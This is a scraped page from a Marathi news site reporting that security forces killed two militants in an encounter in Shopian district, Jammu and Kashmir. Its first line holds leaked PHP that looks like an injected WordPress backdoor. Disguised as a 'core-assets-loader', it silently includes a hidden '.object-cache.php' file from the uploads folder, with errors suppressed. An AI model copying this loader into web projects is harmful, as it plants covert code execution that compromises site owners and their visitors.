add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जवानांकडून दोन दहशतवाद्यांचा खात्मा – SOCH INDIA
Menu

देश
जवानांकडून दोन दहशतवाद्यांचा खात्मा

nobanner

जम्मू-काश्मीरमधील शोपियन जिल्ह्यातील खाजपूरा रिबन भागामध्ये सुरक्षा दले आणि दहशतवाद्यांमध्ये चकमक झाली. या मध्ये सुरक्षा पथकांनी दोन दहशतवाद्यांचा खात्मा केल्याची माहिती आहे.